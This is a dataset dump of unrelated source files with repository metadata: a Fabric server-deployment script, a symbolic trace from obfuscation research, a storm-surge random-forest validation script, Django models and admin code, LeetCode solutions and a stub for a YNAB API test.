28058e366e9d750aaab587835e0cab482b1cfbc9 | 1aa44db2eb5bc0d5be21e54e3ca1f4918d5d84bf | /fabfile/servers.py | 46fd9f14a872917968e1ada16b0b196477e3cc44 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | nprapps/commencement | a2aea873704120aa8249854a1d12798f1a4b1153 | 3f8642225d1910807e6419e95fafd5e0f21fbbac | refs/heads/master | 2021-07-22T00:25:36.353670 | 2021-06-16T22:56:56 | 2021-06-16T22:56:56 | 19,289,147 | 1 | 2 | null | 2015-07-03T22:44:28 | 2014-04-29T19:36:14 | JavaScript | UTF-8 | Python | false | false | 8,460 | py | #!/usr/bin/env python
"""
Commands work with servers. (Hiss, boo.)
"""
import copy
from fabric.api import local, put, settings, require, run, sudo, task
from fabric.state import env
from jinja2 import Template
import app_config
"""
Setup
"""
@task
def setup():
    """
    Setup servers for deployment.

    This does not setup services or push to S3. Run deploy() next.
    Order matters: credentials and directories must exist before the repo
    is cloned and its requirements installed.
    """
    require('settings', provided_by=['production', 'staging'])
    require('branch', provided_by=['stable', 'master', 'branch'])

    # Guard against accidentally provisioning when server deploys are off.
    if not app_config.DEPLOY_TO_SERVERS:
        print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py before setting up the servers.'
        return

    install_google_oauth_creds()
    create_directories()
    create_virtualenv()
    clone_repo()
    checkout_latest()
    install_requirements()
    setup_logs()
def create_directories():
    """
    Create server directories.

    Makes the project directory and the shared uploads directory;
    `mkdir -p` keeps this idempotent.
    """
    require('settings', provided_by=['production', 'staging'])

    run('mkdir -p %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
    run('mkdir -p /var/www/uploads/%(PROJECT_FILENAME)s' % app_config.__dict__)
def create_virtualenv():
    """
    Setup a server virtualenv.
    """
    require('settings', provided_by=['production', 'staging'])

    run('virtualenv -p %(SERVER_PYTHON)s %(SERVER_VIRTUALENV_PATH)s' % app_config.__dict__)
    # NOTE(review): each fabric run() spawns a fresh shell, so this `source`
    # does not persist to later commands -- presumably harmless; verify.
    run('source %(SERVER_VIRTUALENV_PATH)s/bin/activate' % app_config.__dict__)
def clone_repo():
    """
    Clone the source repository.

    Optionally adds a secondary "bitbucket" remote when
    app_config.REPOSITORY_ALT_URL is set.
    """
    require('settings', provided_by=['production', 'staging'])

    run('git clone %(REPOSITORY_URL)s %(SERVER_REPOSITORY_PATH)s' % app_config.__dict__)

    if app_config.REPOSITORY_ALT_URL:
        # Bug fix: the remote must be added from inside the freshly cloned
        # repository; previously this ran from the login directory (not a
        # git repo) and failed.
        run('cd %(SERVER_REPOSITORY_PATH)s; git remote add bitbucket %(REPOSITORY_ALT_URL)s' % app_config.__dict__)
@task
def checkout_latest(remote='origin'):
    """
    Checkout the latest source.

    Fetches `remote`, then checks out and pulls the branch selected by the
    stable/master/branch task (env.branch).
    """
    require('settings', provided_by=['production', 'staging'])
    require('branch', provided_by=['stable', 'master', 'branch'])

    run('cd %s; git fetch %s' % (app_config.SERVER_REPOSITORY_PATH, remote))
    run('cd %s; git checkout %s; git pull %s %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, remote, env.branch))
@task
def install_requirements():
    """
    Install the latest requirements.

    Installs Python packages into the server virtualenv and node packages
    via npm inside the repository checkout.
    """
    require('settings', provided_by=['production', 'staging'])

    run('%(SERVER_VIRTUALENV_PATH)s/bin/pip install -U -r %(SERVER_REPOSITORY_PATH)s/requirements.txt' % app_config.__dict__)
    run('cd %(SERVER_REPOSITORY_PATH)s; npm install' % app_config.__dict__)
@task
def setup_logs():
    """
    Create log directories.

    Creates the log directory owned by the deploy user.
    """
    require('settings', provided_by=['production', 'staging'])

    # Robustness fix: -p so re-running setup doesn't fail when the
    # directory already exists (plain `mkdir` errors out).
    sudo('mkdir -p %(SERVER_LOG_PATH)s' % app_config.__dict__)
    sudo('chown ubuntu:ubuntu %(SERVER_LOG_PATH)s' % app_config.__dict__)
@task
def install_crontab():
    """
    Install cron jobs script into cron.d.
    """
    require('settings', provided_by=['production', 'staging'])

    sudo('cp %(SERVER_REPOSITORY_PATH)s/crontab /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def uninstall_crontab():
    """
    Remove a previously installed cron jobs script from cron.d.
    """
    require('settings', provided_by=['production', 'staging'])

    sudo('rm /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def install_google_oauth_creds():
    """
    Install Google Oauth credentials file (global) from workinprivate repo.
    """
    run('git clone [email protected]:nprapps/workinprivate.git /tmp/workinprivate-tmp')
    # Bug fix: OAUTH_CREDENTIALS_PATH was an undefined bare name (NameError
    # at runtime). Like every other deploy setting in this file, the path
    # lives on app_config -- TODO confirm the attribute name there.
    run('cp /tmp/workinprivate-tmp/.google_oauth_credentials %s' % app_config.OAUTH_CREDENTIALS_PATH)
    run('rm -Rf /tmp/workinprivate-tmp')
@task
def remove_google_oauth_creds():
    """
    Remove Google oauth credentials file (global).
    """
    # Bug fix: OAUTH_CREDENTIALS_PATH was an undefined bare name (NameError
    # at runtime); reference it via app_config -- TODO confirm attribute.
    run('rm %s' % app_config.OAUTH_CREDENTIALS_PATH)
def delete_project():
    """
    Remove the project directory. Invoked by shiva.
    """
    run('rm -rf %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
"""
Configuration
"""
def _get_template_conf_path(service, extension):
"""
Derive the path for a conf template file.
"""
return 'confs/%s.%s' % (service, extension)
def _get_rendered_conf_path(service, extension):
    """
    Derive the rendered path for a conf file, namespaced by the
    project filename.
    """
    filename = '{0}.{1}.{2}'.format(app_config.PROJECT_FILENAME, service, extension)
    return 'confs/rendered/' + filename
def _get_installed_conf_path(service, remote_path, extension):
    """
    Derive the installed path for a conf file under `remote_path`,
    namespaced by the project filename.
    """
    return '{0}/{1}.{2}.{3}'.format(
        remote_path, app_config.PROJECT_FILENAME, service, extension)
def _get_installed_service_name(service):
    """
    Derive the init service name for an installed service,
    namespaced by the project filename.
    """
    return '{0}.{1}'.format(app_config.PROJECT_FILENAME, service)
@task
def render_confs():
    """
    Renders server configurations.

    Each (service, remote_path, extension) triple in SERVER_SERVICES is
    rendered from its Jinja template in confs/ into confs/rendered/.
    """
    require('settings', provided_by=['production', 'staging'])

    # warn_only: the rendered dir may already exist from a previous run.
    with settings(warn_only=True):
        local('mkdir confs/rendered')

    # Copy the app_config so that when we load the secrets they don't
    # get exposed to other management commands
    context = copy.copy(app_config.__dict__)
    context.update(app_config.get_secrets())

    for service, remote_path, extension in app_config.SERVER_SERVICES:
        template_path = _get_template_conf_path(service, extension)
        rendered_path = _get_rendered_conf_path(service, extension)

        with open(template_path, 'r') as read_template:
            with open(rendered_path, 'wb') as write_template:
                payload = Template(read_template.read())
                write_template.write(payload.render(**context))
@task
def deploy_confs():
    """
    Deploys rendered server configurations to the specified server.

    This will reload nginx and the appropriate uwsgi config.
    Only configs whose checksum differs from the installed copy are pushed.
    """
    require('settings', provided_by=['production', 'staging'])

    render_confs()

    with settings(warn_only=True):
        for service, remote_path, extension in app_config.SERVER_SERVICES:
            rendered_path = _get_rendered_conf_path(service, extension)
            installed_path = _get_installed_conf_path(service, remote_path, extension)

            # Compare local (`md5 -q`, macOS) vs remote (`md5sum`, Linux)
            # checksums to detect changes.
            a = local('md5 -q %s' % rendered_path, capture=True)
            b = run('md5sum %s' % installed_path).split()[0]

            if a != b:
                print 'Updating %s' % installed_path
                put(rendered_path, installed_path, use_sudo=True)

                if service == 'nginx':
                    sudo('service nginx reload')
                elif service == 'uwsgi':
                    service_name = _get_installed_service_name(service)
                    sudo('initctl reload-configuration')
                    sudo('service %s restart' % service_name)
                elif service == 'app':
                    # Ensure the uwsgi socket exists with permissions the
                    # web server can use.
                    run('touch %s' % app_config.UWSGI_SOCKET_PATH)
                    sudo('chmod 644 %s' % app_config.UWSGI_SOCKET_PATH)
                    sudo('chown www-data:www-data %s' % app_config.UWSGI_SOCKET_PATH)
            else:
                print '%s has not changed' % rendered_path
@task
def nuke_confs():
    """
    DESTROYS rendered server configurations from the specified server.

    This will reload nginx and stop the uwsgi config.
    """
    require('settings', provided_by=['production', 'staging'])

    for service, remote_path, extension in app_config.SERVER_SERVICES:
        with settings(warn_only=True):
            installed_path = _get_installed_conf_path(service, remote_path, extension)

            sudo('rm -f %s' % installed_path)

            if service == 'nginx':
                sudo('service nginx reload')
            elif service == 'uwsgi':
                # Stop before reloading init configuration so upstart
                # forgets the removed job.
                service_name = _get_installed_service_name(service)
                sudo('service %s stop' % service_name)
                sudo('initctl reload-configuration')
            elif service == 'app':
                sudo('rm %s' % app_config.UWSGI_SOCKET_PATH)
"""
Fabcasting
"""
@task
def fabcast(command):
"""
Actually run specified commands on the server specified
by staging() or production().
"""
require('settings', provided_by=['production', 'staging'])
if not app_config.DEPLOY_TO_SERVERS:
print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py and setup a server before fabcasting.'
run('cd %s && bash run_on_server.sh fab %s $DEPLOYMENT_TARGET %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, command))
| [
"[email protected]"
] | |
b672d74dc3ade9ca857ed2b97d2a8bc96d25a527 | d78989a8ce52a98f48d77228c4ea893f7aae31f7 | /symbolic_expressions/sample15-virt-bogus-loop-iterations-2.py | 80503fc33404de03c7ff542b5ba14a32feb2dee4 | [] | no_license | llyuer/Tigress_protection | 78ead2cf9979a7b3287175cd812833167d520244 | 77c68c4c949340158b855561726071cfdd82545f | refs/heads/master | 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null | UTF-8 | Python | false | false | 1,086 | py | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
    """Sign-extend `value`, read as a `bits`-wide two's-complement integer."""
    sign = 1 << (bits - 1)
    magnitude = value & (sign - 1)
    return magnitude - (value & sign)
# Machine-generated symbolic trace (each ref_* mirrors one instruction
# operating on the symbolic input SymVar_0, read from argv).
# NOTE(review): rol() is never defined in this file -- presumably injected
# by the evaluation harness; running this standalone raises NameError.
SymVar_0 = int(sys.argv[1])
ref_342 = SymVar_0
ref_353 = ref_342 # MOV operation
ref_365 = ref_353 # MOV operation
ref_367 = ref_365 # MOV operation
ref_331345 = ref_367 # MOV operation
ref_331357 = ref_331345 # MOV operation
ref_331403 = ref_331345 # MOV operation
ref_331447 = ref_331345 # MOV operation
# Hash-like mixing of the input: add/rol/xor against constant 0x1F3D5B79,
# truncated to 64 bits at each step.
ref_331534 = (((rol(0xE, (rol(0xE, ((((((((((((0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) + ref_331357) & 0xFFFFFFFFFFFFFFFF) + 0x1F3D5B79) & 0xFFFFFFFFFFFFFFFF)) ^ ref_331403)) ^ 0x1F3D5B79) + ref_331447) & 0xFFFFFFFFFFFFFFFF) # MOV operation
ref_527456 = ref_331534 # MOV operation
ref_592749 = ref_527456 # MOV operation
ref_788657 = ref_592749 # MOV operation
ref_853947 = ref_788657 # MOV operation
ref_853985 = ref_853947 # MOV operation
ref_853997 = ref_853985 # MOV operation
ref_853999 = ref_853997 # MOV operation
# Python 2 print statement: emit the final 64-bit value.
print ref_853999 & 0xffffffffffffffff
| [
"[email protected]"
] | |
23867764f0cc8d30cda919abd564c7282ccb15db | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/201-tideGauge.py | 52b44422312b41361c88c8c467dad6e7167ae1b9 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,456 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
    """
    Run 10-fold cross-validation of a Random Forest surge model for one
    tide gauge (index range [x, y) into the sorted list of predictor CSVs).

    For each gauge: loads lagged MERRA predictors, adds squared/cubed wind
    terms, standardizes, merges with daily-max surge on date, reduces with
    PCA (95% variance), and evaluates RandomForestRegressor with KFold,
    appending mean correlation/RMSE to a summary CSV in dir_out.
    """
    #defining directories
    dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
    dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
    surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"

    #cd to the lagged predictors directory
    os.chdir(dir_in)

    # Gauge index range handled by this job (one gauge: 201).
    x = 201
    y = 202

    #empty dataframe for model validation
    df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
                                 'num_95pcs','corrn', 'rmse'])

    #looping through
    for tg in range(x,y):

        os.chdir(dir_in)

        #filter only .csv files
        tgNames = []
        for file in glob.glob("*.csv"):
            tgNames.append(file)

        tg_name = sorted(tgNames)[tg]
        print(tg_name)

        ##########################################
        #check if this tg is already taken care of
        ##########################################
        os.chdir(dir_out)
        if os.path.isfile(tg_name):
            print("this tide gauge is already taken care of")
            # NOTE(review): `return` aborts the whole loop, not just this
            # gauge -- fine while the range holds a single gauge.
            return "file already analyzed!"

        os.chdir(dir_in)

        #load predictor
        pred = pd.read_csv(tg_name)
        pred.drop('Unnamed: 0', axis = 1, inplace = True)

        #add squared and cubed wind terms (as in WPI model)
        pickTerms = lambda x: x.startswith('wnd')
        wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
        wnd_sqr = pred[wndTerms]**2
        wnd_cbd = pred[wndTerms]**3
        pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)

        #standardize predictor data
        dat = pred.iloc[:,1:]
        scaler = StandardScaler()
        print(scaler.fit(dat))
        dat_standardized = pd.DataFrame(scaler.transform(dat), \
                                        columns = dat.columns)
        pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)

        #load surge data
        os.chdir(surge_path)
        surge = pd.read_csv(tg_name)
        surge.drop('Unnamed: 0', axis = 1, inplace = True)

        #remove duplicated surge rows
        surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
        surge.reset_index(inplace = True)
        surge.drop('index', axis = 1, inplace = True)

        #adjust surge time format to match that of pred
        time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
        surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
        time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
        surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)

        #merge predictors and surge to find common time frame
        pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
        pred_surge.sort_values(by = 'date', inplace = True)

        #find rows that have nans and remove them
        row_nan = pred_surge[pred_surge.isna().any(axis =1)]
        pred_surge.drop(row_nan.index, axis = 0, inplace = True)
        pred_surge.reset_index(inplace = True)
        pred_surge.drop('index', axis = 1, inplace = True)

        #in case pred and surge don't overlap
        if pred_surge.shape[0] == 0:
            print('-'*80)
            print('Predictors and Surge don''t overlap')
            print('-'*80)
            continue

        pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
                                                   pred_surge['date'])), \
                                          columns = ['date'])

        #prepare data for training/testing
        X = pred_surge.iloc[:,1:-1]
        y = pd.DataFrame(pred_surge['surge'])
        y = y.reset_index()
        y.drop(['index'], axis = 1, inplace = True)

        #apply PCA - keep components explaining 95% of the variance
        pca = PCA(.95)
        pca.fit(X)
        X_pca = pca.transform(X)

        #apply 10 fold cross validation
        kf = KFold(n_splits=10, random_state=29)
        metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
        for train_index, test_index in kf.split(X):
            X_train, X_test = X_pca[train_index], X_pca[test_index]
            y_train, y_test = y['surge'][train_index], y['surge'][test_index]

            #train regression model
            rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
                                      min_samples_leaf = 1)
            rf.fit(X_train, y_train)

            #predictions
            predictions = rf.predict(X_test)
            # pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
            #                       pd.DataFrame(np.array(y_test))], \
            #                      axis = 1)
            # pred_obs.columns = ['pred', 'obs']
            # combo = pd.concat([combo, pred_obs], axis = 0)

            #evaluation matrix - check p value
            # Folds with statistically insignificant correlation (p >= 0.05)
            # are excluded from the averages below.
            if stats.pearsonr(y_test, predictions)[1] >= 0.05:
                print("insignificant correlation!")
                continue
            else:
                print(stats.pearsonr(y_test, predictions))
                metric_corr.append(stats.pearsonr(y_test, predictions)[0])
                print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
                print()
                metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))

        #number of years used to train/test model
        num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
                     pred_surge['date'][0]).days/365
        longitude = surge['lon'][0]
        latitude = surge['lat'][0]
        num_pc = X_pca.shape[1] #number of principal components
        corr = np.mean(metric_corr)
        rmse = np.mean(metric_rmse)

        print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
              np.mean(metric_rmse), '\n')

        #original size and pca size of matrix added
        new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
        new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
                          'num_95pcs','corrn', 'rmse']
        df = pd.concat([df, new_df], axis = 0)

        #save df as csv - in case of interruption
        os.chdir(dir_out)
        df.to_csv(tg_name)
# Entry point: run the validation for the configured gauge range.
validateRF()
| [
"[email protected]"
] | |
a741f54aa2bfa5f22db1890af574ff5b01ac58b0 | 4b46bcb9e3883a57f46d490da424e8d9463ba8aa | /PyFolder/Python_Django/app_integration/apps/appintegrate/models.py | 9f694e3217e40b8ecf4af783c0155140d3aaa317 | [] | no_license | LAdkins81/DojoAssignments | 1752c131454dc6f259d4e84390af218e1a423b50 | 7bc7a92bed72ff37c5d8991e478ffae8fefd82db | refs/heads/master | 2021-01-11T17:53:03.814123 | 2017-05-09T14:58:33 | 2017-05-09T14:58:33 | 79,859,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | from __future__ import unicode_literals
from django.db import models
from ..courses.models import Course
from ..loginandreg.models import User
from django.db.models import Count
# Create your models here.
class UserCourseManager(models.Manager):
    """Manager with enrollment helpers for the UserCourse join table."""

    def addUserToCourse(self, object):
        """Enroll a user in a course.

        `object` is a mapping carrying the primary keys under the keys
        'users' and 'courses'. (The parameter name shadows the builtin
        but is kept for backward compatibility with existing callers.)
        """
        enrollee = User.objects.get(id=object['users'])
        target_course = Course.objects.get(id=object['courses'])
        UserCourse.objects.create(user_id=enrollee, course_id=target_course)
        return {'success': 'User added to course'}
class UserCourse(models.Model):
    """Join table linking a registered user to a course."""

    # Despite the *_id names, these are ForeignKey object references.
    user_id = models.ForeignKey(User, null=True, related_name="reg_users")
    course_id = models.ForeignKey(Course, related_name="reg_courses")
    created_at = models.DateTimeField(auto_now_add=True, null=True)
    updated_at = models.DateTimeField(auto_now=True)
    objects = UserCourseManager()
| [
"[email protected]"
] | |
57968c4b0079829bed20ff53911d5d768715b9fd | 7798c5171e4f63b40e9a2d9ae16f4e0f60855885 | /manage.py | b3a505230aac16ae6ce9859ed552d3f4d09d2d80 | [] | no_license | mstepniowski/wffplanner | d2d5ddd2938bd2b7b294332dad0d24fa63c2700a | 62d1d00ca9a546b759e5c394c7a9da06484a7aa3 | refs/heads/master | 2020-05-20T06:04:22.413395 | 2015-10-01T16:12:48 | 2015-10-01T16:12:48 | 6,033,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Default to this project's settings module unless the environment
    # already provides one.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wffplanner.settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
945d9d0dbf297f3e00334a032fd8cd7922a9654e | 6cd87462fd9b5ee575aee281f6d2e4be5391ea92 | /apps/twitter/admin.py | f4524da329c2671ab002a1df4a319053a229dfa3 | [] | no_license | mo-mughrabi/djsocial | 912413574fd7ce943387dbd5744f05ec8ca57f48 | 060c0a8e0db848879dfaeb4c6f44f1dba7a39aea | refs/heads/master | 2016-09-16T10:46:05.853935 | 2014-03-13T19:14:41 | 2014-03-13T19:14:41 | 16,213,862 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | # -*- coding: utf-8 -*-
from django.contrib import admin
from models import Twitter, ScheduleOrder, Order
class TwitterAdmin(admin.ModelAdmin):
    # Columns shown in the admin changelist for Twitter accounts.
    list_display = ('user', 'tid', 'screen_name','followers_sum', 'following_sum')

# Now register the new TwitterAdmin...
admin.site.register(Twitter, TwitterAdmin)
class ScheduleOrderAdmin(admin.ModelAdmin):
    # Columns shown in the admin changelist for scheduled orders.
    list_display = ('user', 'label', 'status','created_at', 'last_run')

admin.site.register(ScheduleOrder, ScheduleOrderAdmin)
class OrderAdmin(admin.ModelAdmin):
    # Columns shown in the admin changelist for executed orders.
    list_display = ('user', 'schedule_order', 'status','created_at', 'executed_at')

admin.site.register(Order, OrderAdmin)
"="
] | = |
4a2d4fecf255307e71b25519413f146f1bdacfd9 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Leetcode/Leetcode - Premium/Mock Interview/isSubsequence.py | 053496e29b0e65f9a467defbd48dcafc83eb967e | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | """
Given a string s and a string t, check if s is subsequence of t.
You may assume that there is only lower case English letters in both s and t. t is potentially a very long (length ~= 500,000) string, and s is a short string (<=100).
A subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, "ace" is a subsequence of "abcde" while "aec" is not).
Example 1:
s = "abc", t = "ahbgdc"
Return true.
Example 2:
s = "axc", t = "ahbgdc"
Return false.
Follow up:
If there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?
Credits:
Special thanks to @pbrother for adding this problem and creating all test cases.
"""
class Solution:
    def isSubsequence(self, s: str, t: str) -> bool:
        """Return True if `s` is a subsequence of `t`.

        Greedy two-pointer scan: advance through `t`, consuming characters
        of `s` as they are matched in order. O(len(t)) time, O(1) space.
        """
        if len(s) == 0:
            return True
        curS, curT = 0, 0
        while curT <= len(t) - 1:
            if s[curS] == t[curT]:
                curS += 1
                if curS == len(s):
                    return True
            curT += 1
        # Bug fix: the original `return curS == l` referenced an undefined
        # name `l` (NameError). Here t is exhausted before s was fully
        # matched, so the answer is whether every character was consumed.
        return curS == len(s)
# Ad-hoc smoke test: expect True ("abc" is a subsequence of "ahbgdc").
s = Solution()
print(s.isSubsequence("abc","ahbgdc"))
"[email protected]"
] | |
b28d0abd6a484e23c277ddb74ecf8140c4ca1fe5 | 1bdf38834c22b0100595cb22f2862fd1ba0bc1e7 | /code308RangeSumQuery2DMutable.py | f914f056042314c3f89d84a5b8ddf3bfe388b092 | [] | no_license | cybelewang/leetcode-python | 48d91c728856ff577f1ccba5a5340485414d6c6e | 635af6e22aa8eef8e7920a585d43a45a891a8157 | refs/heads/master | 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,454 | py | """
308. Range Sum Query 2D - Mutable
Given a 2D matrix matrix, find the sum of the elements inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).
The above rectangle (with the red border) is defined by (row1, col1) = (2, 1) and (row2, col2) = (4, 3), which contains sum = 8.
Example:
Given matrix = [
[3, 0, 1, 4, 2],
[5, 6, 3, 2, 1],
[1, 2, 0, 1, 5],
[4, 1, 0, 1, 7],
[1, 0, 3, 0, 5]
]
sumRegion(2, 1, 4, 3) -> 8
update(3, 2, 2)
sumRegion(2, 1, 4, 3) -> 10
Note:
The matrix is only modifiable by the update function.
You may assume the number of calls to update and sumRegion function is distributed evenly.
You may assume that row1 ≤ row2 and col1 ≤ col2.
"""
"""
Similar problem: 304 Range Sum Query 2D - Immutable
Use Binary Index Tree (BIT) to quickly get the sum of the rectangle area from (0, 0) to (row, col), inclusive
"""
import unittest
class NumMatrix:
    """Mutable 2-D range sums backed by a 2-D Binary Indexed Tree.

    `mat` (0-based) keeps the current cell values so update() can compute
    deltas; `bit` (1-based, (M+1)x(N+1)) holds the Fenwick partial sums.
    update() and getSum() are O(log M * log N).
    """

    def __init__(self, matrix):
        self.M = len(matrix)
        self.N = len(matrix[0]) if self.M > 0 else 0
        self.mat = [[0]*self.N for _ in range(self.M)] # (M)*(N) matrix that stores current value (update method may change value)
        self.bit = [[0]*(self.N+1) for _ in range(self.M+1)] # (M+1)*(N+1) matrix that represents a 2-D BIT
        # use update method to create the 2-D BIT
        for i in range(self.M):
            for j in range(self.N):
                self.update(i, j, matrix[i][j])

    def update(self, row: int, col: int, val: int) -> None:
        """Set cell (row, col) to val and propagate the delta into the BIT."""
        if -1 < row < self.M and -1 < col < self.N:
            diff = val - self.mat[row][col]
            self.mat[row][col] = val
            i = row + 1 # mat has 0-based index and BIT has 1-based index. Pitfall: don't initialize j to (col + 1) here
            while i < self.M + 1:
                j = col + 1
                while j < self.N + 1:
                    self.bit[i][j] += diff
                    j += j & (-j) # jump to the next BIT node covering column j
                i += i & (-i) # jump to the next BIT node covering row i

    def getSum(self, row: int, col: int) -> int:
        """
        sum of the rectangle area from (0, 0) to (row, col), exclusive row & col
        """
        res = 0
        if -1 < row - 1 < self.M and -1 < col - 1 < self.N:
            i = row
            while i > 0:
                j = col
                while j > 0:
                    res += self.bit[i][j]
                    j -= j & (-j) # strip lowest set bit: parent prefix
                i -= i & (-i)
        return res

    def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
        """Inclusive rectangle sum via inclusion-exclusion of four prefixes."""
        return self.getSum(row2+1, col2+1)\
            - self.getSum(row2+1, col1)\
            - self.getSum(row1, col2+1)\
            + self.getSum(row1, col1)
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# obj.update(row,col,val)
# param_2 = obj.sumRegion(row1,col1,row2,col2)
class Test(unittest.TestCase):
    """Smoke test mirroring the LeetCode 308 example."""

    def test_1(self):
        matrix = [[3, 0, 1, 4, 2],\
                  [5, 6, 3, 2, 1],\
                  [1, 2, 0, 1, 5],\
                  [4, 1, 0, 1, 7],\
                  [1, 0, 3, 0, 5]]
        #matrix = [[3, 0], [5, 6]]
        m = NumMatrix(matrix)
        # getSum(2, 2) is the prefix sum of the top-left 2x2 block.
        self.assertEqual(14, m.getSum(2, 2))
        self.assertEqual(8, m.sumRegion(2, 1, 4, 3))
        m.update(3, 2, 2)
        self.assertEqual(10, m.sumRegion(2, 1, 4, 3))

if __name__ == "__main__":
    unittest.main(exit = False)
unittest.main(exit = False) | [
"[email protected]"
] | |
4125a3a6906417841daee6699df1daa262068870 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03069/s036551857.py | 273e2d32d2871800eb6b588af947e2fe9c71f0b3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | import sys,math,collections,itertools
input = sys.stdin.readline
N = int(input())
s = input().rstrip()
cntb =0
cntw = s.count('.')
ans =cntw
for i in range(len(s)):
if s[i] == '#':
cntb +=1
else:
cntw -=1
ans = min(ans,cntb+cntw)
print(ans) | [
"[email protected]"
] | |
f6bdf4d9d98945b174ea3626cac9c7f21706ba7e | 73e939e797cc28aa33a4f55c234237c47167033e | /test/test_transaction_summary.py | b5bc1ae60e987c82adcad1bf24cbb8c6ef351245 | [] | no_license | dmlerner/ynab-api | b883a086e6ce7c5d2bdb5b17f3f0a40dbb380046 | df94b620d9ec626eacb9ce23bfd313f1c589b03a | refs/heads/master | 2023-08-17T14:22:17.606633 | 2023-07-03T17:05:16 | 2023-07-03T17:05:16 | 223,287,209 | 27 | 13 | null | 2023-08-05T18:58:58 | 2019-11-21T23:58:22 | Python | UTF-8 | Python | false | false | 975 | py | """
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ynab_api
from ynab_api.model.transaction_summary import TransactionSummary
